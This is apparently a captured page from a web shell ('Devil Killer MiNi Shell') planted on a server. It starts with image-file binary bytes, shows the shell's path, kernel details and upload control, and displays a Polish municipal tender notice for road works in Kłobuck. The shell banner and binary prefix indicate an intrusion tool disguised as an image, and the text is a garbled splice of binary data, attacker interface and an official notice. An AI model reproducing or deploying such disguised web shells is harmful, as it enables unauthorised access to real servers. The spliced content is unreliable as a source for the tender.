JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025404601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi ul. Ściegiennego i drogi ul. Polnej w Kłobucku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KŁOBUCK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398273</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłobuck</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 310 01 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaklobuck.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gminaklobuck.pl/main/index.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi ul. Ściegiennego i drogi ul. Polnej w Kłobucku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f25c2dc2-e6aa-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00254046</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00001792/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa drogi ul. Ściegiennego i drogi ul. Polnej w Kłobucku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f25c2dc2-e6aa-11ee-a01e-f641a8763d5f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Z zastrzeżeniem postanowień zawartych w rozdziale XVI SWZ oraz w ust. 2 i w ust.<br/>4 rozdziału XII SWZ, komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz.<br/>344), tj:<br/>1) poprzez platformę miniPortal pod adresem:<br/>https://miniportal.uzp.gov.pl/ (zwanej dalej zamiennie miniPortalem), wyłącznie w celu złożenia, zmiany, wycofania oferty za<br/>pośrednictwem stosownego Formularza,<br/>2) kanał ePUAP Urzędu Miejskiego w Kłobucku /umklobuck/skrytka,<br/>3) pocztą elektroniczną na adres e-mail Zamawiającego: sekretariat@gminaklobuck.pl oraz adresy e-mail Wykonawców podane w<br/>formularzach ofertowych. Na wskazany adres e-mail Zamawiającego Wykonawca będzie mógł przesyłać wyłącznie dokumenty<br/>zamówienia opatrzone stosownym podpisem elektronicznym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć<br/>ofertę – zobowiązany jest zapoznać się z instrukcjami użytkowników miniPortalu - dostępnymi pod adresem<br/>https://miniportal.uzp.gov.pl/Instrukcje oraz zaakceptować regulamin korzystania z miniPortalu.<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w ust. 1.<br/>3. Wymagania techniczne związane z korzystaniem z miniPortalu – wskazane są na stronie internetowej miniPortalu - pod adresem:<br/>https://miniportal.uzp.gov.pl/Instrukcje<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii i oświadczeń<br/>oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminu ePUAP.<br/>5. Wsparcia technicznego w zakresie działania miniPortalu Wykonawca może otrzymać pod nr tel. +48 22 458 77 06, +48 22 458 78<br/>75, e-mail: miniPortal@uzp.gov.pl od poniedziałku do piątku (dni robocze) w godz. 8:00 - 14:00.<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>7. Sposób złożenia oferty za pośrednictwem miniPortalu oraz potwierdzenia złożenia oferty zostały opisane w Instrukcjach<br/>użytkowników miniPortalu.<br/>8. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2021 r. poz. 2070), z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>9. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym<br/>oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia<br/>2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Powyższe<br/>oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym oferty) skompresowanych formatem .rar.<br/>10. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane przy użyciu środków<br/>komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>11. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku<br/>obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>12. Pozostałe ustalenia zostały zawarte w rozdz. XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) – RODO /Dz.<br/>Urz. UE L119 z 04.05.2016, str.1 z późn.zm./ informuję:<br/>1. Administratorem Pani/Pana danych osobowych jest Burmistrz Kłobucka z siedzibą: ul. 11 Listopada 6, 42-100 Kłobuck, tel. (34) 31<br/>00 150, e-mail: sekretariat@gminaklobuck.pl<br/>2. Administrator – wyznaczył Inspektora ochrony danych – Pan Jacek Orłowski, z którym może się Pani/Pan skontaktować poprzez<br/>adres e-mail: iod@gminaklobuck.pl lub pisemnie pod adresem: 42-100 Kłobuck ul. 11 Listopada 6. Z inspektorem można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych w szczególności w zakresie<br/>korzystania z praw związanych z ich przetwarzaniem.<br/>3. Pani/Pana dane osobowe przetwarzane są w celu realizacji ustawowych zadań Urzędu wynikających z przepisów prawa tj.: -<br/>ustawa o samorządzie gminnym, - ustawa Prawo zamówień publicznych, - ustawa Prawo o aktach stanu cywilnego, - ustawa o<br/>zmianie imienia i nazwiska, - ustawa o ewidencji ludności, - ustawa o dowodach osobistych, - ustawa o podatkach i opłatach<br/>lokalnych, - ustawa o podatku leśnym, - ustawa o podatku rolnym, - ustawa o wychowaniu w trzeźwości i przeciwdziałaniu<br/>alkoholizmowi, - ustawa o utrzymaniu porządku i czystości w gminach, - ustawa o gospodarce nieruchomościami, - ustawa prawo<br/>budowlane, - ustawa o planowaniu i zagospodarowaniu przestrzennym, - ustawa Kodeks cywilny, - ustawa o pracownikach<br/>samorządowych, - ustawa o Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), - ustawa o ochronie przyrody, -<br/>ustawa o ochronie środowiska, - ustawa o publicznym transporcie zbiorowym, - ustawa Prawo wodne, - ustawa o dostępie do<br/>informacji publicznej, - ustawa Prawo geodezyjne i kartograficzne, - ustawa o rachunkowości, - ustawa o finansach publicznych, -<br/>ustawa Ordynacja podatkowa, - ustawa o zwrocie podatku akcyzowego, - ustawa Prawo oświatowe, - ustawa o usługach<br/>turystycznych, - ustawa o systemie informacji oświatowej, - ustawa o promocji zatrudnienia i instytucjach rynku pracy, - ustawa o<br/>praktykach absolwenckich, - ustawa Prawo o ustroju sądów, - ustawa o powszechnym obowiązku obrony RP, - ustawa o statystyce<br/>publicznej, - ustawa o ubezpieczeniach majątkowych i osobowych, - ustawa o ochronie praw lokatorów, - ustawa o drogach<br/>publicznych, - ustawa Kodeks Postępowania Administracyjnego, - ustawa o petycjach, - ustawa o pomocy obywatelom Ukrainy w<br/>związku z konfliktem zbrojnym na terytorium tego państwa.<br/>Podstawą prawną przetwarzania Pani/Pana danych jest: - art.6 ust.1 lit. b RODO (przetwarzanie jest niezbędne do wykonania<br/>umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed<br/>zawarciem umowy), - art.6 ust.1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>Administratorze), - art.6 ust.1 lit. e RODO (przetwarzanie jest niezbędne do wykonania zadania realizowanego w interesie<br/>publicznym lub w ramach sprawowania władzy publicznej powierzonej Administratorowi).<br/>4. Pani/ Pana dane mogą być udostępnione podmiotom: - upoważnionym na podstawie przepisów prawa, - przetwarzającym dane<br/>na zlecenie i w imieniu Administratora, na podstawie zawartej umowy powierzenia przetwarzania danych osobowych, w celu<br/>świadczenia określonych w umowie usług.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Pani/Pana dane będą przechowywane: - do momentu wygaśnięcia obowiązku<br/>przechowywania danych wynikającego z przepisów prawa, - przez okres niezbędny do realizacji określonego celu/celów, lecz nie<br/>krócej niż przez okres wskazany w przepisach o archiwizacji lub innych przepisach prawa, - do czasu cofnięcia zgody, w przypadku<br/>przetwarzania danych na podstawie wyrażonej zgody.<br/>2. Pani/Pana prawa związane z przetwarzaniem danych osobowych:<br/>a) Do żądania od Administratora dostępu do swoich danych osobowych oraz prawo ich sprostowania, usunięcia lub ograniczenia<br/>przetwarzania, prawo wniesienia sprzeciwu wobec ich przetwarzania oraz prawo do przenoszenia danych.<br/>b) Jeśli przetwarzanie odbywa się na podstawie zgody, do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem.<br/>c) Do wniesienia skargi do organu nadzorczego tj. Prezes Urzędu Ochrony Danych Osobowych /PUODO/ ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie dotyczących jej(-jego) danych osobowych narusza przepisy RODO.<br/>3. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>4. Podanie danych osobowych jest: - niezbędne i wynika z wyżej wskazanych przepisów prawa, - jest dobrowolne w przypadku<br/>danych nieobowiązkowych.<br/>5. Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało zautomatyzowanemu poodejmowaniu<br/>decyzji, w tym profilowaniu, o którym mowa w art. 22 ust. 1 i 4 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.007.2024.SD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ogólny opis przewidywanych robót odcinka drogi gminnej ul. Ściegiennego:<br/>Droga gminna nr 470 153S ul. Ściegiennego zlokalizowana jest na działkach o nr ewid. 3950, 3914/4, długość przebudowywanego odcinka 170 mb w obrębie geodezyjnym Kłobuck, których właścicielem jest Gmina Kłobuck Przedmiot zamówienia obejmuje wykonanie robót budowlanych polegających w szczególności na sfrezowaniu istniejącej nawierzchni drogi, wymianie podbudowy, krawężników oraz kostki brukowej i położeniu nowej nawierzchni bitumicznej wraz z regulacją istniejących urządzeń infrastruktury technicznej, oznakowaniu poziomym jezdni, odtworzeniu i regulacji pasów o szerokości 50 cm przyległych po obu stronach do wymienianych krawężników. <br/><br/><br/><br/>2.	Ogólny opis przewidywanych robót odcinka drogi gminnej ul. Polna: <br/>Droga gminna nr 470 041S ul. Polna zlokalizowana jest na działkach o nr ewid. 3914/4, 4087 długość przebudowywanego odcinka 205 mb tj. do granicy z działką o nr ewid 4044, w obrębie geodezyjnym Kłobuck, której właścicielem jest Gmina Kłobuck. Remont drogi gminnej obejmuje również skrzyżowania z drogami nr 470 153S ul. Ściegiennego, 470 041S ul. Polną i Przedmiot zamówienia obejmuje wykonanie robót budowlanych polegających w szczególności na sfrezowaniu nawierzchni asfaltowej, wymianie podbudowy, wymianie części krawężników oraz ułożeniu nowej nawierzchni bitumicznej, wraz z regulacją istniejących urządzeń infrastruktury technicznej, odtworzeniu i regulacji pasów o szerokości 50 cm przyległych po obu stronach do wymienianych krawężników.<br/>Odtworzenie przejścia dla pieszych przy DK 43. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami<br/>(dla każdej z części):<br/>a) cena ofertowa – 60 %,<br/>b) gwarancja jakości – 40 %.<br/>2. Każdy z Wykonawców w poszczególnych kryteriach otrzyma odpowiednią liczbę punktów, wyliczoną w następujący sposób:<br/>a) cena ofertowa - wg następującego wzoru:<br/>K(c) = Cn/Cb x 100<br/>gdzie poszczególne litery oznaczają:<br/>K(c) – liczba punktów,<br/>Cn – cena ofertowa najniższa spośród wszystkich rozpatrywanych i nieodrzuconych ofert,<br/>Cb – cena ofertowa oferty badanej (przeliczanej),<br/>b) gwarancja jakości – K(g) :<br/>Zamawiający w ramach „kryterium gwarancji jakości” będzie przyznawał punkty za wydłużenie okresu gwarancji na cały przedmiot<br/>zamówienia ponad minimalny, wymagany przez Zamawiającego 60 miesięczny okres gwarancji. W celu uzyskania dodatkowych<br/>punktów, Wykonawca w Formularzu ofertowym może zadeklarować dłuższy niż wymagany minimalny 5 letni okres gwarancji na<br/>przedmiot umowy, ale nie przekraczający 84 miesiące, liczony od dnia podpisania protokołu końcowego odbioru robót budowlanych.<br/>Za każde zadeklarowane, dodatkowe 12 miesięcy udzielonej gwarancji na przedmiot umowy (powyżej minimalnego 60<br/>miesięcznego okresu gwarancji Wykonawca otrzyma następującą liczbę punktów:<br/>- za zaoferowanie 72 miesiące Wykonawca otrzyma 50 punktów;<br/>- za zaoferowanie 84 miesiące Wykonawca otrzyma 100 punktów.<br/>3. W ramach wszystkich wskazanych i opisanych kryteriów, Wykonawca otrzyma końcową (łączną) ilość punktów wyliczoną w<br/>następujący sposób:<br/>KIP = K(c) x 60% + K(g) x 40%<br/>gdzie symbol KIP oznacza końcową ilość punktów,<br/>Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu i przy uwzględnieniu powyższych kryteriów otrzyma<br/>najwyższą punktację.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>4.1. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>4.2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 4.1, Zamawiający wzywa Wykonawców, którzy złożyli<br/>te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający nie określa<br/>szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>3. Sytuacja ekonomiczna lub finansowa:<br/>Za minimalny poziom zdolności w zakresie spełnienia tego warunku Zamawiający będzie uznawał, wykazanie przez<br/>Wykonawcę, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500.000,00 zł, lub dla walut obcych na kwotę w wysokości<br/>równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego<br/>w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w 